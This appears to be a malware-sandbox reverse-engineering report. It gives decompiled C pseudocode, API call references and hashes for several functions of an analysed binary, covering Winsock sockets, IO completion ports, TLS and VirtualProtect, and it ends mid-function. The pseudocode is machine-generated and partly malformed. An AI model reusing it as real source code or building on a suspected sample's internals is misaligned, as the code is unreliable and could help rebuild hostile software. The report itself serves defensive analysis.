Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$CompletionEnterPostQueuedStatus$ErrorLastLeaveSend
String ID:
API String ID: 4134261196-0
Opcode ID: 527b3b5557f177e5bd6e9ff16b2a46d0f616026bec934d27dc4c255837557d8a
Instruction ID: b7873a9c13a2805a903fbcd8c4fcb15e28ca554b8f1870db7a1ad727c0199dd4
Opcode Fuzzy Hash: 527b3b5557f177e5bd6e9ff16b2a46d0f616026bec934d27dc4c255837557d8a
Instruction Fuzzy Hash: 71516CB0601704EFDB20CF55D988B96BBF8FF84304F10846AEA069B291D778E954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404860 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00404860(signed int __ecx) {
				intOrPtr _v8;
				long _v16;
				char _v24;
				signed int _v32;
				long _v36;
				void* _v40;
				void* _v44;
				long* _v48;
				intOrPtr _v52;
				long _v56;
				signed int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t66;
				void* _t70;
				long _t71;
				long _t72;
				signed int _t75;
				long _t76;
				signed int _t81;
				signed int _t82;
				long _t83;
				signed int _t89;
				long _t93;
				intOrPtr _t97;
				void* _t101;
				signed int _t103;
				intOrPtr* _t113;
				long* _t116;
				void* _t117;
				long* _t119;
				void* _t121;
				void** _t123;
				signed int _t124;
				void* _t125;
				void* _t131;
				signed int _t134;

				_t101 = _t131;
				_t134 = (_t131 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t101 + 4));
				_t129 = _t134;
				_push(0xffffffff);
				_push(0x413ead);
				_push( *[fs:0x0]);
				_push(_t101);
				_t65 =  *0x41b014; // 0x149e0abf
				_t66 = _t65 ^ _t134;
				_v32 = _t66;
				_push(_t66);
				 *[fs:0x0] =  &_v24;
				_v60 = __ecx;
				_t113 =  *((intOrPtr*)(_t101 + 0xc));
				_t119 =  *(_t101 + 8);
				_t116 =  *(_t101 + 0x1c);
				_v40 =  *((intOrPtr*)(_t101 + 0x10));
				_v52 =  *((intOrPtr*)(_t101 + 0x14));
				_t70 =  *((intOrPtr*)(_t101 + 0x18));
				_v48 = _t119;
				_v56 = _t113;
				_v44 = _t70;
				if( *_t113 == 0xffffffff) {
					__imp__#112(0);
					__imp__WSASocketW(_v40, _v52, _v44, 0, 0, 1); // executed
					_v44 = _t70;
					_t71 = E00412970();
					__imp__#111();
					_t116[1] = _t71;
					_t121 = _v44;
					 *_t116 = _t71;
					__eflags = _t121 - 0xffffffff;
					if(_t121 != 0xffffffff) {
						__eflags = _v40 - 0x17;
						if(_v40 == 0x17) {
							_v36 = 0;
							__imp__#21(_t121, 0x29, 0x1b,  &_v36, 4);
						}
						_t72 = E00412970();
						 *_t116 = 0;
						_t116[1] = _t72;
					} else {
						_t121 = _t121;
						_v44 = _t121;
					}
					_v40 = _t121;
					_v16 = 0;
					__eflags = _t121 - 0xffffffff;
					if(_t121 != 0xffffffff) {
						_t75 = CreateIoCompletionPort(_t121,  *( *((intOrPtr*)(_v60 + 4)) + 0x14), 0, 0); // executed
						__eflags = _t75;
						if(_t75 != 0) {
							_t76 = E00412970();
							 *_t116 = 0;
						} else {
							_t93 = GetLastError();
							_t76 = E00412970();
							 *_t116 = _t93;
						}
						_t103 =  *_t116;
						_t116[1] = _t76;
						_t114 = _t76;
						__eflags = _t103;
						_t78 =  ==  ? 0 : E00401790;
						__eflags =  ==  ? 0 : E00401790;
						if(( ==  ? 0 : E00401790) == 0) {
							_t123 = _v56;
							_v40 = 0xffffffff;
							 *_t123 = _v44;
							_t81 = _v52 - 1;
							__eflags = _t81;
							if(_t81 == 0) {
								_t123[1] = 0x10;
							} else {
								_t81 = _t81 - 1;
								__eflags = _t81;
								if(_t81 == 0) {
									_t123[1] = 0x20;
								} else {
									_t123[1] = 0;
								}
							}
							_t82 = E00412C3A(_t81, _t101, _t116, _t123, 0x10);
							_t114 = _v56;
							asm("xorps xmm0, xmm0");
							_v60 = _t82;
							asm("movups [eax], xmm0");
							 *(_t82 + 4) = 1;
							 *(_t82 + 8) = 1;
							 *_t82 = 0x415a74;
							 *(_t82 + 0xc) = 0;
							_t123[2] = 0;
							_t124 = _t123[3];
							 *(_v56 + 0xc) = _t82;
							__eflags = _t124;
							if(_t124 != 0) {
								__eflags = _t82 | 0xffffffff;
								asm("lock xadd [esi+0x4], eax");
								if((_t82 | 0xffffffff) == 0) {
									_t89 =  *((intOrPtr*)( *_t124))();
									__eflags = _t89 | 0xffffffff;
									asm("lock xadd [esi+0x8], eax");
									if((_t89 | 0xffffffff) == 0) {
										 *((intOrPtr*)( *_t124 + 4))();
									}
								}
							}
							_t83 = E00412970();
							_t119 = _v48;
							 *_t116 = 0;
							_t116[1] = _t83;
							 *_t119 = 0;
							_t119[1] = _t83;
						} else {
							_t119 = _v48;
							 *_t119 = _t103;
							_t119[1] = _t114;
						}
					} else {
						_t119 = _v48;
						 *_t119 =  *_t116;
						_t119[1] = _t116[1];
					}
					E00403490(_t101,  &_v40, _t116);
				} else {
					_t97 =  *0x41e580; // 0x80000003
					if(_t97 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
						E00412B64(_t97, 0x41e580);
						_t144 =  *0x41e580 - 0xffffffff;
						if( *0x41e580 == 0xffffffff) {
							E00412FBB(_t144, 0x414e90);
							E00412B1A(0x41e580);
						}
					}
					 *_t116 = 1;
					_t116[1] = 0x41b02c;
					 *_t119 = 1;
					_t119[1] = 0x41b02c;
				}
				 *[fs:0x0] = _v24;
				_pop(_t117);
				_pop(_t125);
				return E00412A1E(_t119, _t101, _v32 ^ _t129, _t114, _t117, _t125);
			}

0x00404861
0x00404869
0x00404870
0x00404874
0x00404876
0x00404878
0x00404883
0x00404884
0x00404888
0x0040488d
0x0040488f
0x00404894
0x00404898
0x0040489e
0x004048a1
0x004048a7
0x004048aa
0x004048b0
0x004048b6
0x004048b9
0x004048bc
0x004048bf
0x004048c2
0x004048c5
0x0040492d
0x00404942
0x00404948
0x0040494b
0x00404952
0x00404958
0x0040495b
0x0040495e
0x00404960
0x00404963
0x0040496c
0x00404970
0x00404977
0x00404984
0x00404984
0x0040498a
0x0040498f
0x00404995
0x00404965
0x00404965
0x00404967
0x00404967
0x00404998
0x0040499b
0x004049a2
0x004049a5
0x004049c7
0x004049cd
0x004049cf
0x004049e2
0x004049e7
0x004049d1
0x004049d1
0x004049d9
0x004049de
0x004049de
0x004049ed
0x004049f1
0x004049f4
0x004049f6
0x004049fd
0x00404a00
0x00404a02
0x00404a11
0x00404a17
0x00404a1e
0x00404a23
0x00404a23
0x00404a26
0x00404a39
0x00404a28
0x00404a28
0x00404a28
0x00404a2b
0x00404a33
0x00404a2d
0x00404a2d
0x00404a2d
0x00404a2b
0x00404a3f
0x00404a44
0x00404a47
0x00404a4d
0x00404a50
0x00404a53
0x00404a5a
0x00404a61
0x00404a67
0x00404a6e
0x00404a75
0x00404a78
0x00404a7b
0x00404a7d
0x00404a7f
0x00404a82
0x00404a87
0x00404a8d
0x00404a8f
0x00404a92
0x00404a97
0x00404a9d
0x00404a9d
0x00404a97
0x00404a87
0x00404aa0
0x00404aa5
0x00404aa8
0x00404aae
0x00404ab1
0x00404ab7
0x00404a04
0x00404a04
0x00404a07
0x00404a09
0x00404a09
0x004049a7
0x004049a7
0x004049af
0x004049b1
0x004049b1
0x00404abd
0x004048c7
0x004048cf
0x004048da
0x004048e1
0x004048e9
0x004048f0
0x004048f7
0x00404904
0x00404909
0x004048f0
0x0040490c
0x00404912
0x00404919
0x0040491f
0x0040491f
0x00404ac7
0x00404acf
0x00404ad0
0x00404ae1

APIs

WSASetLastError.WS2_32(00000000,149E0ABF,00000002,?,?,?,?,?,?,00413EAD,000000FF,?,?,?,00000000), ref: 0040492D
WSASocketW.WS2_32(?,00000001,?,00000000,00000000,00000001), ref: 00404942
WSAGetLastError.WS2_32(?,?,?,?,?,?,00413EAD,000000FF,?,?,?,00000000), ref: 00404952

Part of subcall function 00412B64: EnterCriticalSection.KERNEL32(0041E1D0,?,?,?,004012FF,0041E1C4,149E0ABF,?,00414D36,000000FF), ref: 00412B6F
Part of subcall function 00412B64: LeaveCriticalSection.KERNEL32(0041E1D0,?,?,?,004012FF,0041E1C4,149E0ABF,?,00414D36,000000FF), ref: 00412BAC

setsockopt.WS2_32(?,00000029,0000001B,?,00000004), ref: 00404984
CreateIoCompletionPort.KERNELBASE(?,?,00000000,00000000), ref: 004049C7
GetLastError.KERNEL32 ref: 004049D1

Part of subcall function 00412B1A: EnterCriticalSection.KERNEL32(0041E1D0,?,?,00401329,0041E1C4,00414F30), ref: 00412B24
Part of subcall function 00412B1A: LeaveCriticalSection.KERNEL32(0041E1D0,?,?,00401329,0041E1C4,00414F30), ref: 00412B57
Part of subcall function 00412B1A: RtlWakeAllConditionVariable.NTDLL ref: 00412BCE

Strings

HYA, xrefs: 00404912, 0040491F

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$ErrorLast$EnterLeave$CompletionConditionCreatePortSocketVariableWakesetsockopt
String ID: HYA
API String ID: 2254990704-3949630065
Opcode ID: 6525206a42e93f9129eca33c92cf326625821bfdac005244af82e6b51d2b72a0
Instruction ID: 68a2f5468c65948c6721bc3abfb42522b0de37fa0bd36c57d22f70fbc38bf5a1
Opcode Fuzzy Hash: 6525206a42e93f9129eca33c92cf326625821bfdac005244af82e6b51d2b72a0
Instruction Fuzzy Hash: 64818EB0A00605DFDB10DF69C94479ABBF0FB48710F10866AE965AB3D1D379A850CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402820 Relevance: 12.2, APIs: 8, Instructions: 246
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00402820(long __ecx, long* _a8) {
				long _v8;
				char _v16;
				signed int _v20;
				long _v24;
				long _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				long _v44;
				signed int _v48;
				union _LARGE_INTEGER _v52;
				struct _OVERLAPPED* _v56;
				long* _v60;
				int _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				struct _CRITICAL_SECTION* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				signed int _t98;
				long _t106;
				long _t111;
				long _t112;
				long _t113;
				long _t116;
				intOrPtr _t117;
				long _t124;
				long _t128;
				long* _t131;
				signed int _t138;
				signed int _t139;
				long _t148;
				void* _t149;
				struct _CRITICAL_SECTION* _t150;
				long* _t154;
				long* _t160;
				signed int _t166;
				long* _t172;
				long _t176;
				void* _t177;
				intOrPtr* _t179;
				_Unknown_base(*)()* _t180;
				long* _t181;
				_Unknown_base(*)()* _t182;
				void* _t183;
				signed int _t185;
				void* _t186;
				void* _t187;

				_push(0xffffffff);
				_push(0x413c6d);
				_push( *[fs:0x0]);
				_t187 = _t186 - 0x44;
				_t97 =  *0x41b014; // 0x149e0abf
				_t98 = _t97 ^ _t185;
				_v20 = _t98;
				_push(_t98);
				 *[fs:0x0] =  &_v16;
				_t176 = __ecx;
				_v60 = _a8;
				do {
					_t147 = 1;
					goto L2;
					do {
						do {
							L2:
							_t172 = _t176 + 0x34;
							do {
								asm("lock cmpxchg [edx], ecx");
								if(_t147 != 1) {
									L19:
									_v32 = 0;
									_v36 = 0;
									_v56 = 0;
									SetLastError(0);
									_v64 = GetQueuedCompletionStatus( *(_t176 + 0x14),  &_v32,  &_v36,  &_v56,  *(_t176 + 0x28));
									_t106 = GetLastError();
									_t179 = _v56;
									_t148 = _t106;
									if(_t179 == 0) {
										if(_v64 != 0) {
											goto L30;
										}
										goto L28;
									}
									goto L20;
								}
								_t150 = _t176 + 0x38;
								_v80 = _t150;
								EnterCriticalSection(_t150);
								_v76 = 1;
								asm("xorps xmm0, xmm0");
								_v8 = 0;
								asm("movlpd [ebp-0x18], xmm0");
								_v28 = 0;
								_v24 = 0;
								_v8 = 1;
								_t128 =  *(_t176 + 0x54);
								if(_t128 != 0) {
									_v28 = _t128;
									_v24 =  *(_t176 + 0x58);
									 *(_t176 + 0x54) = 0;
									 *(_t176 + 0x58) = 0;
								}
								_t180 =  *(_t176 + 0x50);
								if(_t180 == 0) {
									L8:
									E00402750(_t176,  &_v28);
									if( *((intOrPtr*)(_t176 + 0x2c)) == 0) {
										L13:
										_v8 = 2;
										_t172 = _v28;
										_t181 = _t172;
										if(_t181 == 0) {
											L18:
											_v8 = 0xffffffff;
											LeaveCriticalSection(_t150);
											goto L19;
										}
										_t131 = _t181;
										do {
											if(_t131 != 0) {
												_v64 = 0;
												_t165 =  ==  ? _v64 : _v24;
												_v28 = _t172[5];
												_v24 =  ==  ? _v64 : _v24;
												_t172[5] = 0;
											}
											_v72 = 0;
											_v68 = E00412970();
											 *(_t181[6])(0, _t181,  &_v72, 0);
											_t172 = _v28;
											_t187 = _t187 + 0x10;
											_t181 = _t172;
											_t131 = _t172;
										} while (_t172 != 0);
										goto L18;
									}
									_t182 =  *(_t176 + 0x50);
									_t166 = 0x11e1a300;
									if(_t182 == 0) {
										goto L13;
									} else {
										goto L10;
									}
									do {
										L10:
										_t138 =  *((intOrPtr*)( *_t182 + 0xc))(_t166);
										_t182 =  *(_t182 + 4);
										_t166 = _t138;
									} while (_t182 != 0);
									if(_t166 < 0x11e1a300) {
										_t139 =  ~_t166;
										_v52.LowPart = _t139 * 0xa;
										_v48 = _t139 * 0xa >> 0x20;
										SetWaitableTimer( *(_t176 + 0x30),  &_v52, 0x493e0, _t182, _t182, _t182);
									}
									goto L13;
								} else {
									goto L7;
								}
								do {
									L7:
									 *((intOrPtr*)( *_t180 + 0x10))( &_v28);
									_t180 =  *(_t180 + 4);
								} while (_t180 != 0);
								goto L8;
								L30:
								_t172 = _t176 + 0x34;
								_t147 = 1;
							} while (_v36 == 1);
							_t172 = _t176 + 0x20;
							 *_t172 = 0;
							asm("lock xadd [eax], ecx");
						} while (0 == 0);
						_t111 =  *_t172;
						 *_t172 = 1;
						if(_t111 != 0 || PostQueuedCompletionStatus( *(_t176 + 0x14), _t111, _t111, _t111) != 0) {
							_t112 = E00412970();
							_t154 = _v60;
							 *_t154 = 0;
						} else {
							_t116 = GetLastError();
							_t112 = E00412970();
							_t154 = _v60;
							 *_t154 = _t116;
						}
						L36:
						_t154[1] = _t112;
						_t113 = 0;
						L37:
						 *[fs:0x0] = _v16;
						_pop(_t177);
						_pop(_t183);
						_pop(_t149);
						return E00412A1E(_t113, _t149, _v20 ^ _t185, _t172, _t177, _t183);
						L20:
						_t117 = E00412970();
						_v44 = _t148;
						_v40 = _t117;
						if(_v36 != 2) {
							 *_t179 = _t117;
							 *(_t179 + 8) = _v44;
							 *((intOrPtr*)(_t179 + 0xc)) = _v32;
						} else {
							_v44 =  *(_t179 + 8);
							_v40 =  *_t179;
							_v32 =  *((intOrPtr*)(_t179 + 0xc));
						}
						_t147 = 1;
						asm("lock cmpxchg [ecx], edx");
					} while (0 != 1);
					_v64 = _t176;
					_v8 = 3;
					 *((intOrPtr*)( *((intOrPtr*)(_t179 + 0x18))))(_t176, _t179,  &_v44, _v32); // executed
					_t124 = E00412970();
					_t160 = _v60;
					 *_t160 = 0;
					_t160[1] = _t124;
					_v8 = 4;
					_t172 = 0xffffffffffffffff;
					asm("lock xadd [edi+0x18], edx");
					if(1 == 0) {
						E004026D0(1, _t176, _t176);
					}
					_t113 = _t147;
					goto L37;
					L28:
				} while (_t148 == 0x102);
				_t112 = E00412970();
				_t154 = _v60;
				 *_t154 = _t148;
				goto L36;
			}

0x00402823
0x00402825
0x00402830
0x00402831
0x00402834
0x00402839
0x0040283b
0x00402841
0x00402845
0x0040284b
0x00402850
0x00402853
0x00402853
0x00402853
0x00402858
0x00402858
0x00402858
0x00402858
0x00402860
0x00402864
0x0040286b
0x004029a2
0x004029a4
0x004029ab
0x004029b2
0x004029b9
0x004029d7
0x004029da
0x004029e0
0x004029e3
0x004029e7
0x00402a86
0x00000000
0x00000000
0x00000000
0x00402a86
0x00000000
0x004029e7
0x00402871
0x00402875
0x00402878
0x0040287e
0x00402882
0x00402885
0x0040288c
0x00402891
0x00402898
0x0040289f
0x004028a3
0x004028a8
0x004028aa
0x004028b0
0x004028b3
0x004028ba
0x004028ba
0x004028c1
0x004028c6
0x004028da
0x004028e0
0x004028e9
0x00402936
0x00402936
0x0040293a
0x0040293d
0x00402941
0x00402994
0x00402995
0x0040299c
0x00000000
0x0040299c
0x00402943
0x00402945
0x00402947
0x00402951
0x00402958
0x0040295c
0x0040295f
0x00402962
0x00402962
0x00402969
0x00402975
0x00402984
0x00402986
0x00402989
0x0040298c
0x0040298e
0x00402990
0x00000000
0x00402945
0x004028eb
0x004028ee
0x004028f5
0x00000000
0x00000000
0x00000000
0x00000000
0x004028f7
0x004028f7
0x004028fc
0x004028ff
0x00402902
0x00402904
0x0040290e
0x00402912
0x0040291e
0x0040292d
0x00402930
0x00402930
0x00000000
0x00000000
0x00000000
0x00000000
0x004028c8
0x004028c8
0x004028d0
0x004028d3
0x004028d6
0x00000000
0x00402aa0
0x00402aa4
0x00402aa7
0x00402aa7
0x00402ab2
0x00402ab7
0x00402abe
0x00402ac2
0x00402acc
0x00402acc
0x00402ad0
0x00402af6
0x00402afb
0x00402afe
0x00402ae2
0x00402ae2
0x00402aea
0x00402aef
0x00402af2
0x00402af2
0x00402b04
0x00402b04
0x00402b07
0x00402b09
0x00402b0c
0x00402b14
0x00402b15
0x00402b16
0x00402b24
0x004029ed
0x004029ed
0x004029f6
0x004029f9
0x004029fc
0x00402a11
0x00402a16
0x00402a1c
0x004029fe
0x00402a03
0x00402a06
0x00402a0c
0x00402a0c
0x00402a1f
0x00402a2b
0x00402a2f
0x00402a37
0x00402a3a
0x00402a4d
0x00402a52
0x00402a57
0x00402a5a
0x00402a60
0x00402a63
0x00402a6a
0x00402a6d
0x00402a72
0x00402a76
0x00402a76
0x00402a7b
0x00000000
0x00402a88
0x00402a88
0x00402a94
0x00402a99
0x00402a9c
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,149E0ABF), ref: 00402878
SetWaitableTimer.KERNEL32(?,?,000493E0,00000001,00000001,00000001), ref: 00402930
LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040299C
SetLastError.KERNEL32(00000000,149E0ABF), ref: 004029B9
GetQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?), ref: 004029D1
GetLastError.KERNEL32 ref: 004029DA
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001), ref: 00402AD8
GetLastError.KERNEL32 ref: 00402AE2

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLast$CompletionCriticalQueuedSectionStatus$EnterLeavePostTimerWaitable
String ID:
API String ID: 2185479551-0
Opcode ID: 8b17f379b8d183638752728e9d248dd4c1801f4125b0681713975c7b246a67cf
Instruction ID: 59dad52d1f89a4f47c9da38e1b4518715f2b0736d66d4f7237b7692eaa13b322
Opcode Fuzzy Hash: 8b17f379b8d183638752728e9d248dd4c1801f4125b0681713975c7b246a67cf
Instruction Fuzzy Hash: BEA15D71A016059FDB25DFA5CA88BEEBBF4FF48314F10412AE905A7380D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00402C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E00402C60(void* __ebx, long* __ecx, void* __edi) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				void* _v36;
				char* _v40;
				void _v44;
				signed char _v52;
				void* __esi;
				void* __ebp;
				signed int _t29;
				signed int _t30;
				intOrPtr _t32;
				void* _t39;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t48;
				long* _t50;
				intOrPtr* _t52;
				long _t60;
				void* _t61;
				void* _t62;
				long* _t64;
				char _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				void* _t72;
				void* _t73;

				_t50 = __ecx;
				_t49 = __ebx;
				_push(0xffffffff);
				_push(0x413cd5);
				_push( *[fs:0x0]);
				_t73 = _t72 - 0x1c;
				_t29 =  *0x41b014; // 0x149e0abf
				_t30 = _t29 ^ _t70;
				_v20 = _t30;
				_push(__edi);
				_push(_t30);
				 *[fs:0x0] =  &_v16;
				_t64 = __ecx;
				_v28 = 0;
				_t32 = E00412970();
				_t60 =  *((intOrPtr*)(_t64 + 8));
				_v24 = _t32;
				asm("lock xadd [eax], edx");
				if(0 != 0) {
					_v32 = 0;
					_v8 = 0;
					asm("xorps xmm0, xmm0");
					_v36 = 0;
					asm("movq [ebp-0x28], xmm0");
					_v44 = _t60;
					_v40 =  &_v32;
					_v36 = TlsGetValue( *0x41e598);
					TlsSetValue( *0x41e598,  &_v44);
					_v8 = 1;
					_t39 = E00402820(_t60, _t50,  &_v28); // executed
					_t61 = _t39;
					TlsSetValue( *0x41e598, _v36);
					_v8 = 0xffffffff;
					_t41 = _v32;
					if(_t41 != 0) {
						_push(_t41);
						L00412FD0();
						_t73 = _t73 + 4;
					}
					_t66 = _v28;
				} else {
					E004026D0(__ebx, _t60, _t60);
					_t66 = 0;
					_t48 = E00412970();
					_v28 = 0;
					_t61 = 0;
					_v24 = _t48;
				}
				if(_t66 != 0) {
					_t52 =  &_v28;
					_t42 = E00401C70(_t52, _t66);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t70);
					_push(_t66);
					_t67 = _t52;
					 *_t67 = 0x415740;
					if((_v52 & 0x00000001) != 0) {
						_push(0x14);
						E00412FD5(_t42, _t67);
					}
					return _t67;
				} else {
					 *[fs:0x0] = _v16;
					_pop(_t62);
					_pop(_t69);
					return E00412A1E(_t61, _t49, _v20 ^ _t70, 0, _t62, _t69);
				}
			}

0x00402c60
0x00402c60
0x00402c63
0x00402c65
0x00402c70
0x00402c71
0x00402c74
0x00402c79
0x00402c7b
0x00402c7f
0x00402c80
0x00402c84
0x00402c8a
0x00402c8c
0x00402c93
0x00402c98
0x00402c9d
0x00402ca3
0x00402ca9
0x00402cc3
0x00402cca
0x00402cda
0x00402cdd
0x00402ce4
0x00402ce9
0x00402cec
0x00402cfb
0x00402d08
0x00402d0d
0x00402d15
0x00402d1d
0x00402d25
0x00402d27
0x00402d2e
0x00402d33
0x00402d35
0x00402d36
0x00402d3b
0x00402d3b
0x00402d3e
0x00402cab
0x00402cad
0x00402cb2
0x00402cb4
0x00402cb9
0x00402cbc
0x00402cbe
0x00402cbe
0x00402d43
0x00402d62
0x00402d65
0x00402d6a
0x00402d6b
0x00402d6c
0x00402d6d
0x00402d6e
0x00402d6f
0x00402d70
0x00402d77
0x00402d78
0x00402d7a
0x00402d80
0x00402d82
0x00402d85
0x00402d8a
0x00402d91
0x00402d45
0x00402d4a
0x00402d52
0x00402d53
0x00402d61
0x00402d61

APIs

TlsGetValue.KERNEL32(149E0ABF), ref: 00402CEF
TlsSetValue.KERNEL32(?), ref: 00402D08
TlsSetValue.KERNEL32(00000000), ref: 00402D25

Part of subcall function 004026D0: PostQueuedCompletionStatus.KERNEL32(00000001,00000001,00000001,00000001), ref: 00402704
Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 0040270E

Strings

p-@, xrefs: 00402D7A

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: Value$CompletionErrorLastPostQueuedStatus
String ID: p-@
API String ID: 1352505536-4249266749
Opcode ID: 9c24571c43ba0426de479933c19ef733b4395983fa3ef7d4917754782d52949c
Instruction ID: 153756222969727eede42cfc48c385721272c255f5e9c0a2390b49aec3e730b9
Opcode Fuzzy Hash: 9c24571c43ba0426de479933c19ef733b4395983fa3ef7d4917754782d52949c
Instruction Fuzzy Hash: 8331A371D00219DBDB10DFA9D945BEEBBB9EF48324F14413BE904B7290EBB859408BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00425F3E Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 693
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00425430: __wremove.LIBCMTD ref: 00425439

VirtualProtect.KERNELBASE(00000040,?), ref: 00426557

Strings

|A, xrefs: 0042632D
!h|A, xrefs: 0042634E

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: ProtectVirtual__wremove
String ID: !h|A$|A
API String ID: 3142238588-4126206309
Opcode ID: 66ff77ce7c077efa84d324a0aa5c3af9cc899dc6c050b044d820b2618ded04b1
Instruction ID: 302bf456c52e85b0774ae08ec4ef62a2c05ca2fd05eb13f985fe2f8c0f5f0632
Opcode Fuzzy Hash: 66ff77ce7c077efa84d324a0aa5c3af9cc899dc6c050b044d820b2618ded04b1
Instruction Fuzzy Hash: 8D22FD71402661BBC321ABA2AE4CDDF7F6CEF4A355B004429F689E1071DB385645CBBE

Uniqueness

Uniqueness Score: -1.00%

Function 00410BA0 Relevance: 4.7, APIs: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00410BA0(long* __ecx) {
				intOrPtr _v8;
				long _v16;
				char _v24;
				signed int _v32;
				long _v36;
				long _v40;
				long* _v44;
				long* _v48;
				intOrPtr _v52;
				char _v56;
				long _v64;
				intOrPtr _v68;
				long _v76;
				intOrPtr _v80;
				long* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t81;
				long* _t87;
				long _t89;
				intOrPtr* _t100;
				struct _OVERLAPPED* _t112;
				void* _t114;
				long _t126;
				long* _t131;
				void* _t132;
				long _t134;
				intOrPtr _t135;
				long* _t137;
				void* _t139;
				struct _OVERLAPPED* _t140;
				void* _t145;

				_t114 = _t145;
				_v8 =  *((intOrPtr*)(_t114 + 4));
				_t143 = (_t145 - 0x00000008 & 0xfffffff8) + 4;
				_push(0xffffffff);
				_push(0x414bcd);
				_push( *[fs:0x0]);
				_push(_t114);
				_t80 =  *0x41b014; // 0x149e0abf
				_t81 = _t80 ^ (_t145 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_v32 = _t81;
				_push(_t81);
				 *[fs:0x0] =  &_v24;
				_t137 = __ecx;
				_v84 = __ecx;
				_v80 =  *((intOrPtr*)(_t114 + 8));
				if( *((intOrPtr*)(__ecx)) != 0xffffffff) {
					L9:
					_v36 = _t137[0x10];
					_v76 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xc))));
					_t87 =  &_v76;
					_push(_t87);
					_v52 = _t87;
					_t131 = E00401E20(0x3c);
					_v48 = _t131;
					_v16 = 0;
					_t131[5] = 0;
					_t131[6] = E00411660;
					 *_t131 = 0;
					_t131[1] = 0;
					_t131[2] = 0;
					_t131[3] = 0;
					_t131[4] = 0;
					_t131[7] = 0;
					_t131[8] = 0;
					_t89 = E00412970();
					_t129 = 0x1c;
					_t131[9] = _t89;
					_t131[0xa] = 0;
					_t131[0xb] = E004046D0;
					_t131[0xc] =  *_t137;
					_t131[0xd] = 0;
					_t131[0xe] = _v76;
					_t92 =  !=  ? 0x1c : 0x10;
					_v44 = _t131;
					_t94 = E00404EB0(_v36 + 0x14, _v84,  *((intOrPtr*)(_v84 + 0x1c)), 1, _v80,  !=  ? 0x1c : 0x10, _t131); // executed
					L10:
					 *[fs:0x0] = _v24;
					_pop(_t132);
					_pop(_t139);
					return E00412A1E(_t94, _t114, _v32 ^ _t143, _t129, _t132, _t139);
				}
				_v40 = 0;
				_v36 = E00412970();
				_t134 =  !=  ? 0x17 : 2;
				_t100 = E00404860(_t137[0x10] + 0x14,  &_v48, _t137, 2, 1, 6,  &_v40); // executed
				if( *_t100 == 0) {
					asm("xorps xmm0, xmm0");
					_v68 = 2;
					asm("movlpd [ebp-0x30], xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_v64 = 0;
					asm("movups xmm0, [ebp-0x38]");
					_t137[7] = _t134;
					_t137[8] = 0;
					asm("movups [esi+0x24], xmm0");
					asm("movq xmm0, [ebp-0x28]");
					asm("movq [esi+0x34], xmm0");
					_t137[0xf] = 0;
				}
				_t126 = _v40;
				_t129 = 0;
				_t102 =  ==  ? 0 : E00401790;
				_t158 =  ==  ? 0 : E00401790;
				if(( ==  ? 0 : E00401790) == 0) {
					goto L9;
				} else {
					_v48 = _t126;
					_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xc))));
					asm("movq xmm0, [ebp-0x28]");
					_v48 = _v36;
					asm("movq [ebp-0x2c], xmm0");
